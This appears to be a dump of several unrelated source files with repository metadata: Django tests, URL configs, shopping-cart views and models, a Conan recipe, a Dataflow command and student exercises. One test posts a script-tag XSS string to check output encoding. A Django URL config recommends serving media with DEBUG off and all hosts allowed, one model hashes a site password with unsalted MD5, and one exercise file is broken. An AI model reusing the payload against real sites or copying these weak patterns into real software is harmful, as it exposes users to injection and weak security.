assert str(answer_obj.course_key) == data['course_id']
def test_encoding_answers(self):
"""
Verify that if some potentially harmful input data is sent, that is is properly HTML encoded
"""
data = dict.copy(self.student_answers)
data['field1'] = '<script type="javascript">alert("Deleting filesystem...")</script>'
resp = self.client.post(
self.postback_url,
data
)
assert resp.status_code == 200
answers = self.survey.get_answers(self.student)
assert '<script type="javascript">alert("Deleting filesystem...")</script>' ==\
answers[self.student.id]['field1']
|
[
"rafael.luque@osoco.es"
] |
rafael.luque@osoco.es
|
c182670425a76e290a3d131e32c3fce1768e54e4
|
9c718b8964d476db4728fc0cf18e24292dd8cf60
|
/MxOnline/MxOnline/urls.py
|
b6f6b97c405f6cd71efc76a9ad34b390a91b32ce
|
[] |
no_license
|
1400720231/Django-Projects
|
960f9226e0f5c01628afd65b9a78e810fdeb1b83
|
72f96788163f7ffe76e7599966ddbfa1d2199926
|
refs/heads/master
| 2021-06-25T17:41:14.147011
| 2019-04-03T02:24:38
| 2019-04-03T02:24:38
| 114,955,012
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,372
|
py
|
"""MxOnline URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
# from django.contrib import admin
import xadmin
from django.views.generic import TemplateView # 专门处理静态文件的View
from django.views.static import serve # 处理静态文件的
from users.views import LoginView, RegisterView, ActiveUserView, ForgetPwdViws, ResetView, ModifyPwdView, LogoutView
from users.views import IndexView
from MxOnline.settings import MEDIA_ROOT
# STATIC_ROOT
urlpatterns = [
url(r'^xadmin/', xadmin.site.urls),
url(r'^$', IndexView.as_view(), name='index'),
url(r'^logout/$', LogoutView, name='logout'),
url(r'^login/$', LoginView.as_view(), name='login'),
url(r'^register/$', RegisterView.as_view(), name='register'),
url(r'^captcha/', include('captcha.urls')),
url(r'^active/(?P<active_code>.*)/$', ActiveUserView.as_view(), name='user_active'), # 邮箱激活的url
url(r'^forget/$', ForgetPwdViws.as_view(), name='forget_pwd'),
url(r'^reset/(?P<active_code>.*)/$', ResetView.as_view(), name='reset_pwd'), # 重置的get方法url
url(r'^modify/$', ModifyPwdView.as_view(), name='modify_pwd'),
# 机构课程url配置
url(r'^org/', include('organization.urls', namespace='org')),
# 课程相关url配置
url(r'^course/', include('courses.urls', namespace='course')),
# 配置上传访问文件
url(r'^media/(?P<path>.*)/$', serve, {'document_root': MEDIA_ROOT}),
# debug=false 时配置static文件 访问地址
# url(r'^static/(?P<path>.*)/$', serve, {'document_root': STATIC_ROOT}),
# user.views
url(r'^users/', include('users.urls', namespace='users'))
]
"""
1> handler404配置
全局404 配置, 名字是固定写法,django会自动识别的:handler404
2> 处理404状态码的视图函数配置
def page_not_found(request):
from django.shortcuts import render_to_response
response = render_to_response('404.html')
response.status_code = 404
return response
3> setting.py下记得把DEBUG=True 改为False
不然输入不存在的访问地址的时候2>中的函数无效。返回不了2>中函数的'404.html页面'
4> ALLOWED_HOSTS = ['*']
DEBUG = False的时候必须设置ALLOWED_HOSTS参数(原来为ALLOWED_HOSTS=[]),
这里的'*'表示所有客户端都可以访问
5> 静态文件重新访问服务配置
当DEBUG=False的时候,你会发现所有没有了css样式,因为此时django不会再帮你默认管理
这些样式文件了,一般来讲都是配置是再Apache,或者nginx上面的,所以我们像meida_root那样
配置serve函数
"""
# 全局400 页面函数,
handler404 = 'users.views.page_not_found'
# 全局500 页面函数
handler500 = 'users.views.page_error'
|
[
"937886362@qq.com"
] |
937886362@qq.com
|
adc32cb60c226e739cab0037aec5df3d8b0ede09
|
0b5c6244ff93d6bac085fe0309961e0ce5e8c004
|
/conanfile.py
|
920fe9a2c6a788aa79bf1fd9229e60e1447b50ad
|
[
"MIT"
] |
permissive
|
jgsogo/conan-cpython
|
b46ee2b82e157a5035caf0fa42bc8e1f420f0432
|
12526431898cc4002e78ac0f12a1c2c19c45fab6
|
refs/heads/master
| 2020-05-18T13:32:58.670959
| 2019-05-01T16:07:12
| 2019-05-01T16:07:12
| 184,443,371
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,232
|
py
|
from conans import ConanFile, tools, AutoToolsBuildEnvironment
import shutil
import os
class CPython(ConanFile):
name = "cpython"
version = "3.7.3"
settings = "os", "arch", "compiler", "build_type"
def source(self):
url = "https://github.com/python/cpython/archive/v{v}.tar.gz".format(v=self.version)
tools.get(url)
shutil.move("cpython-{v}".format(v=self.version), self.name)
# Patch some Python modules to ensure 'is_python_build' returns True
tools.replace_in_file(os.path.join(self.source_folder, self.name, "Lib", "sysconfig.py"),
"_sys_home = getattr(sys, '_home', None)",
"_sys_home = None # Force it (we are calling this script from installed python)")
def build(self):
autotools = AutoToolsBuildEnvironment(self)
autotools.configure(configure_dir=self.name)
autotools.make()
#autotools.install()
def package(self):
autotools = AutoToolsBuildEnvironment(self)
autotools.install()
def package_info(self):
self.cpp_info.libs = ["python3.7m", "intl", ] # TODO: Handle intl
self.cpp_info.includedirs = ["include/python3.7m", ]
|
[
"jgsogo@gmail.com"
] |
jgsogo@gmail.com
|
606160379df1371f13cbf233b2360cdc0625e5e2
|
2a54e8d6ed124c64abb9e075cc5524bb859ba0fa
|
/.history/3-OO-Python/14-multiple-inheritance_20200417235022.py
|
fa05f62062a5c7bdc540b7d8c3135b15d4cb001f
|
[] |
no_license
|
CaptainStorm21/Python-Foundation
|
01b5fbaf7a913506518cf22e0339dd948e65cea1
|
a385adeda74f43dd7fb2d99d326b0be23db25024
|
refs/heads/master
| 2021-05-23T01:29:18.885239
| 2020-04-23T19:18:06
| 2020-04-23T19:18:06
| 253,171,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
#multiple inheritance
class User(object):
def __init__ (self, name, power):
self.name = name
self.power = power
print('init complete')
def attack(self):
print(f'attacking {self.power} power')
class Wizard(User):
def __init__(self, name, power, ):
super().__init__(email)
self.name = name
self.power = power
wizard1 = Wizard('Merlin', 50, 'wizard@oz.com' )
# print(wizard1.email)
|
[
"tikana4@yahoo.com"
] |
tikana4@yahoo.com
|
c78331a1949f81f08f8e919c0054d33c36185ece
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_272/ch25_2019_03_22_10_51_48_563237.py
|
edf748e7c17e8fc0272a7e4d4c199205c36332a8
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 202
|
py
|
distância=float(input("Digite a distância a percorrer:"))
if distância <= 200:
passagem = 0.5 * distância
else:
passagem = 0.45 * distância
print("Preço da passagem: R$ %7.2f" % passagem)
|
[
"you@example.com"
] |
you@example.com
|
b25aabcca727963ff09e4b3871e95ec4ca64f57f
|
d7ccb4225f623139995a7039f0981e89bf6365a4
|
/.history/carts/views_20211013002410.py
|
cfd3366c7921be447536d4c99af00755e78511bb
|
[] |
no_license
|
tonnymuchui/django-mall
|
64fd4abc3725c1bd0a3dcf20b93b490fe9307b37
|
55c083d8433be3c77adc61939cd197902de4ce76
|
refs/heads/master
| 2023-08-23T04:59:20.418732
| 2021-10-13T15:59:37
| 2021-10-13T15:59:37
| 415,668,388
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,133
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from store.models import Product,Variation
from .models import Cart, CartItem
from django.core.exceptions import ObjectDoesNotExist
# Create your views here.
def _cart_id(request):
cart = request.session.session_key
if not cart:
cart = request.session.create()
return cart
def add_cart(request, product_id):
product = Product.objects.get(id=product_id)
product_variation = []
if request.method == 'POST':
for item in request.POST:
key = item
value = request.POST[key]
try:
variation = Variation.objects.get(product=product, variation_category__iexact=key, variation_value__iexact=value)
product_variation.append(variation)
except:
pass
try:
cart = Cart.objects.get(cart_id=_cart_id(request)) # get the cart using the cart_id present in the session
except Cart.DoesNotExist:
cart = Cart.objects.create(
cart_id = _cart_id(request)
)
cart.save()
is_cart_item_exists = CartItem.objects.filter(product=product, cart=cart).exists()
if is_cart_item_exists:
cart_item = CartItem.objects.filter(product=product, cart=cart)
# existing_variations -> database
# current variation -> product_variation
# item_id -> database
ex_var_list = []
id = []
for item in cart_item:
existing_variation = item.variations.all()
ex_var_list.append(list(existing_variation))
id.append(item.id)
print(ex_var_list)
if product_variation in ex_var_list:
# increase the cart item quantity
index = ex_var_list.index(product_variation)
item_id = id[index]
item = CartItem.objects.get(product=product, id=item_id)
item.quantity += 1
item.save()
else:
item = CartItem.objects.create(product=product, quantity=1, cart=cart)
if len(product_variation) > 0:
item.variations.clear()
item.variations.add(*product_variation)
item.save()
else:
cart_item = CartItem.objects.create(
product = product,
quantity = 1,
cart = cart,
)
if len(product_variation) > 0:
cart_item.variations.clear()
cart_item.variations.add(*product_variation)
cart_item.save()
return redirect('cart')
def cart(request, total=0, quantity=0, cart_items=None):
try:
tax = 0;
grand_total = 0;
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_items = CartItem.objects.filter(cart=cart, is_active=True)
for cart_item in cart_items:
total += (cart_item.product.price * cart_item.quantity)
quantity += cart_item.quantity
tax = (2 * total)/100
grand_total = total + tax
except ObjectDoesNotExist:
pass
context = {
'total': total,
'quantity': quantity,
'cart_items': cart_items,
'tax': tax,
'grand_total': grand_total,
}
return render(request, 'store/cart.html', context)
def remove_cart(request, product_id, cart_item_id):
cart = Cart.objects.get(cart_id=_cart_id(request))
product = get_object_or_404(Product, id=product_id)
cart_item = CartItem.objects.get(product=product, cart=cart, id=cart_item_id)
if cart_item.quantity > 1:
cart_item.quantity -= 1
cart_item.save()
else:
cart_item.delete()
return redirect('cart')
def remove_cart_item(request, product_id):
product = get_object_or_404(Product, id=product_id)
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_item = CartItem.objects.get(product=product, cart=cart)
cart_item.delete()
return redirect('cart')
|
[
"tonykanyingah@gmail.com"
] |
tonykanyingah@gmail.com
|
674032ef2c7902a92fc86f8d1c731b4f2225bde8
|
717c07ef9f2192042dd850f916041404b2ab33f5
|
/setup.py
|
9182f67805f044bbcda64b333aad14127bf4e5c9
|
[] |
no_license
|
espenmn/bda.plone.shopviews
|
38f6cc0057da4ab41d49ababd6a0b570376c78c5
|
36a2848839e7dea44c1020a98440707196719b99
|
refs/heads/master
| 2021-01-18T22:24:40.544985
| 2014-02-21T10:11:34
| 2014-02-21T10:11:34
| 10,687,852
| 0
| 0
| null | 2016-09-16T11:35:27
| 2013-06-14T11:48:36
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,256
|
py
|
import os
from setuptools import (
setup,
find_packages,
)
version = '0.3'
shortdesc = " bda.plone.shop: Demo Views"
longdesc = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
longdesc += open(os.path.join(os.path.dirname(__file__), 'CHANGES.rst')).read()
longdesc += open(os.path.join(os.path.dirname(__file__), 'LICENSE.rst')).read()
setup(name='bda.plone.shopviews',
version=version,
description=shortdesc,
long_description=longdesc,
classifiers=[
'Environment :: Web Environment',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
author='Espen Moe-Nilssenn',
author_email='post@medialog.no',
license='GNU General Public Licence',
packages=find_packages(exclude=['ez_setup']),
namespace_packages=['bda', 'bda.plone'],
include_package_data=True,
zip_safe=False,
install_requires=[
'setuptools',
'Plone',
'bda.plone.shop',
],
entry_points="""
[z3c.autoinclude.plugin]
target = plone
""",
)
|
[
"espen@medialog.no"
] |
espen@medialog.no
|
84136442ecdc9dd8adb4d27a1c727a5b81d14a55
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03837/s721538098.py
|
7ad462b06891930c96b5534664848c98d247d1a8
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
from scipy.sparse.csgraph import floyd_warshall
N,M = map(int,input().split())
edge = [[float("inf") for i in range(N)] for j in range(N) ]
abc = []
for _ in range(M):
a,b,c = map(int,input().split())
abc.append((a,b,c))
edge[a-1][b-1] = c
edge[b-1][a-1] = c
dist = floyd_warshall(edge)
ans = 0
for a,b,c in abc:
if dist[a-1][b-1] != c:
ans += 1
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
56b611cdd23a3eacfbe961dbbf80ce0bc18ede57
|
546b8c3e1b876aab272e587765951e8acd7b3122
|
/irlc/ex04/pid_lunar.py
|
7c78652995c803115c7a65deee9af271741577a6
|
[] |
no_license
|
natashanorsker/RL_snakes
|
2b8a9da5dd1e794e832830ab64e57ab7d4b0d6c3
|
be8c75d1aa7a5ba7a6af50a0a990a97b0242c49d
|
refs/heads/main
| 2023-04-21T14:08:30.840757
| 2021-05-11T17:33:35
| 2021-05-11T17:33:35
| 358,572,447
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,817
|
py
|
"""
For information about the Apollo 11 lunar lander see:
https://eli40.com/lander/02-debrief/
For code for the Gym LunarLander environment see:
https://github.com/openai/gym/blob/master/gym/envs/box2d/lunar_lander.py
(although we will only need the time discretization of dt=1/50).
This implementation is inspired by:
https://github.com/wfleshman/PID_Control/blob/master/pid.py
But for some reason I had better success with different parameters for the PID controller.
"""
import gym
import matplotlib.pyplot as plt
import numpy as np
from irlc import VideoMonitor
from irlc import train
from irlc.ex04.pid import PID
from irlc import Agent
from irlc.ex04 import speech
from irlc import savepdf
class ApolloLunarAgent(Agent):
def __init__(self, env, dt, Kp_altitude=18, Kd_altitude=13, Kp_angle=-18, Kd_angle=-18): #Ki=0.0, Kd=0.0, target=0):
self.Kp_altitude = Kp_altitude
self.Kd_altitude = Kd_altitude
self.Kp_angle = Kp_angle
self.Kd_angle = Kd_angle
self.error_angle = []
self.error_altitude = []
self.dt = dt
super().__init__(env)
def pi(self, x, t=None):
""" From documentation: https://github.com/openai/gym/blob/master/gym/envs/box2d/lunar_lander.py
x (list): The state. Attributes:
x[0] is the horizontal coordinate
x[1] is the vertical coordinate
x[2] is the horizontal speed
x[3] is the vertical speed
x[4] is the angle
x[5] is the angular speed
x[6] 1 if first leg has contact, else 0
x[7] 1 if second leg has contact, else 0
Your implementation should follow what happens in:
https://github.com/wfleshman/PID_Control/blob/master/pid.py
I.e. you have to compute the target for the angle and altitude as done in the code (and explained in the documentation.
Note the target for the PID controllers is 0.
"""
if t == 0:
self.pid_alt = PID(dt=self.dt, Kp=self.Kp_altitude, Kd=self.Kd_altitude, Ki=0, target=0)
self.pid_ang = PID(dt=self.dt, Kp=self.Kp_angle, Kd=self.Kd_angle, Ki=0, target=0)
# TODO: 2 lines missing.
raise NotImplementedError("Compute the alt_adj and ang_adj as in the gitlab repo (see code comment).")
u = np.array([alt_adj, ang_adj])
u = np.clip(u, -1, +1)
# If the legs are on the ground we made it, kill engines
if (x[6] or x[7]):
u[:] = 0
# Record stats.
self.error_altitude.append(self.pid_alt.e_prior)
self.error_angle.append(self.pid_ang.e_prior)
return u
def get_lunar_lander(env):
# dt = 1. / env.metadata['video.frames_per_second']
from gym.envs.box2d.lunar_lander import FPS
dt = 1/FPS # Get time discretization from environment.
spars = ['Kp_altitude', 'Kd_altitude', 'Kp_angle', 'Kd_angle']
def x2pars(x2):
return {spars[i]: x2[i] for i in range(4)}
x_opt = np.asarray([52.23302414, 34.55938593, -80.68722976, -38.04571655])
env = VideoMonitor(env)
agent = ApolloLunarAgent(env, dt=dt, **x2pars(x_opt))
return agent
def lunar_single_mission():
env = gym.make('LunarLanderContinuous-v2')
env._max_episode_steps = 1000 # We don't want it to time out.
agent = get_lunar_lander(env)
env = VideoMonitor(env)
stats, traj = train(env, agent, return_trajectory=True, num_episodes=1)
env.close()
if traj[0].reward[-1] == 100:
print("A small step for man, a giant leap for mankind!")
elif traj[0].reward[-1] == -100:
print(speech)
else:
print("Environment timed out and the lunar module is just kind of floating around")
states = traj[0].state
plt.plot(states[:, 0], label='x')
plt.plot(states[:, 1], label='y')
plt.plot(states[:, 2], label='vx')
plt.plot(states[:, 3], label='vy')
plt.plot(states[:, 4], label='theta')
plt.plot(states[:, 5], label='vtheta')
plt.legend()
plt.grid()
plt.ylim(-1.1, 1.1)
plt.title('PID Control')
plt.ylabel('Value')
plt.xlabel('Steps')
savepdf("pid_lunar_trajectory")
plt.show()
def lunar_average_performance():
env = gym.make('LunarLanderContinuous-v2')
env._max_episode_steps = 1000 # We don't want it to time out.
agent = get_lunar_lander(env)
stats, traj = train(env, agent, return_trajectory=True, num_episodes=20)
env.close()
n_won = sum([np.sum(t.reward[-1] == 100) for t in traj])
n_lost = sum([np.sum(t.reward[-1] == -100) for t in traj])
print("Successfull landings: ", n_won, "of 20")
print("Unsuccessfull landings: ", n_lost, "of 20")
if __name__ == "__main__":
lunar_single_mission()
lunar_average_performance()
|
[
"natashanorsker@gmail.com"
] |
natashanorsker@gmail.com
|
577f382690dff09da10759418a2580aa9d7df66f
|
aadcddb4daee7ae84cb0785f9b0e82d8b5f6a1af
|
/gemtown/users/migrations/0008_auto_20190424_2025.py
|
b75ca7729635aea695e0c8b10f8dd2bbd06538d3
|
[
"MIT"
] |
permissive
|
doramong0926/gemtown
|
082d210493930312ad3ecf3e813f568204979387
|
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
|
refs/heads/master
| 2022-12-12T10:23:11.363452
| 2019-05-23T17:18:03
| 2019-05-23T17:18:03
| 183,075,120
| 0
| 0
|
NOASSERTION
| 2022-12-09T20:37:50
| 2019-04-23T18:37:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,538
|
py
|
# Generated by Django 2.0.13 on 2019-04-24 11:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0007_auto_20190424_2011'),
]
operations = [
migrations.AlterField(
model_name='user',
name='country',
field=models.CharField(blank=True, choices=[('hk', 'Hong Kong'), ('kr', 'Korea'), ('id', 'Indonesia'), ('cn', 'China'), ('sg', 'Singapore'), ('vn', 'Viet Nam'), ('jp', 'Japan'), ('us', 'United States of America')], default='kr', max_length=80),
),
migrations.AlterField(
model_name='user',
name='gender',
field=models.CharField(blank=True, choices=[('female', 'Female'), ('not_specified', 'Not specified'), ('foregin_male', 'Foregin_Male'), ('foregin_female', 'Foregin_Female'), ('male', 'Male')], max_length=80),
),
migrations.AlterField(
model_name='user',
name='mobile_country',
field=models.CharField(blank=True, choices=[('hk', 'Hong Kong'), ('kr', 'Korea'), ('id', 'Indonesia'), ('cn', 'China'), ('sg', 'Singapore'), ('vn', 'Viet Nam'), ('jp', 'Japan'), ('us', 'United States of America')], default='kr', max_length=80),
),
migrations.AlterField(
model_name='user',
name='user_class',
field=models.CharField(blank=True, choices=[('artist', 'Artist'), ('common', 'Common'), ('company', 'Company')], default='nomal', max_length=80),
),
]
|
[
"doramong0926@gmail.com"
] |
doramong0926@gmail.com
|
2126d0e6f819d2f8228404e6da813259e36d4d9d
|
23611933f0faba84fc82a1bc0a85d97cf45aba99
|
/google-cloud-sdk/.install/.backup/lib/surface/dataflow/logs/list.py
|
f28762d652662cd185af353118e8e3f26c73be04
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KaranToor/MA450
|
1f112d1caccebdc04702a77d5a6cee867c15f75c
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
refs/heads/master
| 2021-06-21T06:17:42.585908
| 2020-12-24T00:36:28
| 2020-12-24T00:36:28
| 79,285,433
| 1
| 1
|
Apache-2.0
| 2020-12-24T00:38:09
| 2017-01-18T00:05:44
|
Python
|
UTF-8
|
Python
| false
| false
| 4,207
|
py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of gcloud dataflow logs list command.
"""
from googlecloudsdk.api_lib.dataflow import apis
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.dataflow import dataflow_util
from googlecloudsdk.command_lib.dataflow import job_utils
from googlecloudsdk.command_lib.dataflow import time_util
from googlecloudsdk.core.resource import resource_projection_spec
class List(base.ListCommand):
"""Retrieve the job logs for a specific job.
Retrieves the job logs from a specified job using the Dataflow Messages API
with at least the specified importance level. Can also be used to display
logs between a given time period using the --before and --after flags. These
logs are produced by the service and are distinct from worker logs. Worker
logs can be found in Cloud Logging.
## EXAMPLES
Retrieve only error logs:
$ {command} --importance=error
Retrieve all logs after some date:
$ {command} --after="2016-08-12 00:00:00"
"""
@staticmethod
def Args(parser):
job_utils.ArgsForJobRef(parser)
base.SORT_BY_FLAG.RemoveFromParser(parser)
base.URI_FLAG.RemoveFromParser(parser)
base.ASYNC_FLAG.RemoveFromParser(parser)
base.PAGE_SIZE_FLAG.RemoveFromParser(parser)
parser.add_argument(
'--after',
type=time_util.ParseTimeArg,
help='Only display messages logged after the given time. Time format is'
' yyyy-mm-dd hh-mm-ss')
parser.add_argument(
'--before',
type=time_util.ParseTimeArg,
help='Only display messages logged before the given time. Time format'
' is yyyy-mm-dd hh-mm-ss')
parser.add_argument(
'--importance',
choices=['debug', 'detailed', 'warning', 'error'],
default='warning',
help='Minimum importance a message must have to be displayed.')
def Collection(self):
return 'dataflow.logs'
def Defaults(self):
importances = {
'JOB_MESSAGE_DETAILED': 'd',
'JOB_MESSAGE_DEBUG': 'D',
'JOB_MESSAGE_WARNING': 'W',
'JOB_MESSAGE_ERROR': 'E',
}
symbols = {'dataflow.JobMessage::enum': importances}
return resource_projection_spec.ProjectionSpec(symbols=symbols)
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: all the arguments that were provided to this command invocation.
Returns:
None on success, or a string containing the error message.
"""
job_ref = job_utils.ExtractJobRef(args.job)
importance_enum = (
apis.Messages.LIST_REQUEST.MinimumImportanceValueValuesEnum)
importance_map = {
'debug': importance_enum.JOB_MESSAGE_DEBUG,
'detailed': importance_enum.JOB_MESSAGE_DETAILED,
'error': importance_enum.JOB_MESSAGE_ERROR,
'warning': importance_enum.JOB_MESSAGE_WARNING,
}
request = apis.Messages.LIST_REQUEST(
projectId=job_ref.projectId,
jobId=job_ref.jobId,
minimumImportance=(args.importance and importance_map[args.importance]),
# Note: It if both are present, startTime > endTime, because we will
# return messages with actual time [endTime, startTime).
startTime=args.after and time_util.Strftime(args.after),
endTime=args.before and time_util.Strftime(args.before))
return dataflow_util.YieldFromList(
job_id=job_ref.jobId,
project_id=job_ref.projectId,
service=apis.Messages.GetService(),
request=request,
batch_size=args.limit,
batch_size_attribute='pageSize',
field='jobMessages')
|
[
"toork@uw.edu"
] |
toork@uw.edu
|
9bf73ed630402dac7ae78a0d8024344fb7bc36c1
|
a20cb5dfd6ae2e5067a822f3b828a7c72e55489a
|
/7_Reverse_Integer.py
|
3ff33ebfc65f4d84fb3ae102c4fc7428f7f587d1
|
[
"MIT"
] |
permissive
|
rpm1995/LeetCode
|
51f6325cf77be95bb1106d18de75974e03dba9b7
|
147d99e273bc398c107f2aef73aba0d6bb88dea0
|
refs/heads/master
| 2021-12-07T12:00:59.386002
| 2021-08-12T02:55:19
| 2021-08-12T02:55:19
| 193,178,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
class Solution:
def reverse(self, x):
"""
:type x: int
:rtype: int
"""
negative = False
if x < 0:
negative = True
# x = str(abs(x))
# y = ""
# for i in range(len(x) - 1, -1 ,-1):
# y += x[i]
# if negative is True:
# y = "-" + y
# y.strip()
# if int(y) < -2**31 or int(y) > (2**31) -1:
# return 0
# return int(y)
x = abs(x)
y = 0
while x:
y = (y * 10) + (x % 10)
x = x // 10
if negative:
y *= -1
return y if -2 ** 31 < y < 2 ** 31 else 0
|
[
"31997276+rpm1995@users.noreply.github.com"
] |
31997276+rpm1995@users.noreply.github.com
|
ce6e545dd6aeacb825dbc02fce6b0fdcd0e09478
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/pa3/sample/stmt_for_list_nonlocal-83.py
|
700f6f1b7fdff2447bb0082637f068e893d2663f
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
py
|
x:int = 0
def crunch(zz:[[int]]) -> object:
z:[int] = None
global x
def make_z() -> object:
nonlocal z
for z in zz:
pass # Set z to last element in zz
make_z()
for x in z:
pass # Set x to last element in z
crunch([[$Exp,2],[2,3],[4,5],[6,7]])
print(x)
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
1873a83d2c391a13a16edf28969ffb67056d7544
|
54c7e0d5c63246c46652292f3817fa6d46512fa8
|
/apps/base/models.py
|
5efae51e43b1c0788011dfc7ca040c98509e0f35
|
[
"Apache-2.0"
] |
permissive
|
helianthus1997/BlogBackendProject
|
4360d3837fa27b78c1e57c84d94f1055333ae15c
|
d4c0ee0bf19e5578e07425465930e1004cbe16d7
|
refs/heads/master
| 2020-03-14T11:29:53.918567
| 2018-04-14T17:00:39
| 2018-04-14T17:00:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,048
|
py
|
import hashlib
from django.db import models
from material.models import MaterialSocial, MaterialMaster
class NavigationLink(models.Model):
"""
自定义导航
"""
TARGET_TYPE = (
("_blank", "blank - 浏览器总在一个新打开、未命名的窗口中载入目标文档。"),
("_self", "self - 这个目标的值对所有没有指定目标的 <a> 标签是默认目标,它使得目标文档载入并显示在相同的框架或者窗口中作为源文档。这个目标是多余且不必要的,除非和文档标题 <base> 标签中的 target 属性一起使用。"),
("_parent", "parent - 这个目标使得文档载入父窗口或者包含来超链接引用的框架的框架集。如果这个引用是在窗口或者在顶级框架中,那么它与目标 _self 等效。"),
("_top", "top - 这个目标使得文档载入包含这个超链接的窗口,用 _top 目标将会清除所有被包含的框架并将文档载入整个浏览器窗口。")
)
name = models.CharField(max_length=30, verbose_name="名称", help_text="名称")
desc = models.CharField(max_length=100, verbose_name="简介", help_text="简介")
image = models.ImageField(upload_to="base/friendlink/image/%y/%m", null=True, blank=True, verbose_name="图片", help_text="图片")
url = models.CharField(max_length=200, verbose_name="链接", help_text="链接")
target = models.CharField(max_length=10, choices=TARGET_TYPE, null=True, blank=True, verbose_name="Target类别",
help_text="对应于a标签中的target属性")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
class Meta:
verbose_name = "自定义导航"
verbose_name_plural = verbose_name + '列表'
def __str__(self):
return self.name
class SiteInfo(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
name_en = models.CharField(default="", max_length=20, verbose_name="名称英文", help_text="名称英文")
desc = models.CharField(default="", max_length=20, verbose_name="简介", help_text="简介")
icon = models.ImageField(upload_to="base/site/image/%y/%m", null=True, blank=True, verbose_name="图标", help_text="图标")
api_base_url = models.URLField(max_length=30, null=False, blank=False, verbose_name='API接口BaseURL')
navigations = models.ManyToManyField(NavigationLink, through="SiteInfoNavigation", through_fields=(
'site', 'navigation'), verbose_name='自定义导航', help_text='自定义导航')
copyright = models.CharField(default="", max_length=100, verbose_name="版权", help_text="版权")
icp = models.CharField(default="", max_length=20, verbose_name="ICP", help_text="ICP")
is_live = models.BooleanField(default=False, verbose_name="是否激活", help_text="是否激活")
is_force_refresh = models.BooleanField(default=False, verbose_name="是否强制刷新", help_text="是否强制刷新")
access_password = models.CharField(max_length=20, null=True, blank=True, verbose_name="访问密码", help_text="浏览密码")
access_password_encrypt = models.CharField(max_length=100, null=True, blank=True, verbose_name="浏览密码加密",
help_text="访问密码加密")
add_time = models.DateTimeField(auto_now_add=True, null=True, blank=True, verbose_name="添加时间", help_text="添加时间")
def __str__(self):
return self.name
def save(self, *args, **kwargs):
if self.access_password:
md5 = hashlib.md5()
md5.update(self.access_password.encode('utf8'))
self.access_password_encrypt = md5.hexdigest()
else:
self.access_password_encrypt = ''
super(SiteInfo, self).save(*args, **kwargs)
class Meta:
verbose_name = "网站信息"
verbose_name_plural = verbose_name + '列表'
class BloggerInfo(models.Model):
name = models.CharField(default="", max_length=20, verbose_name="名称", help_text="名称")
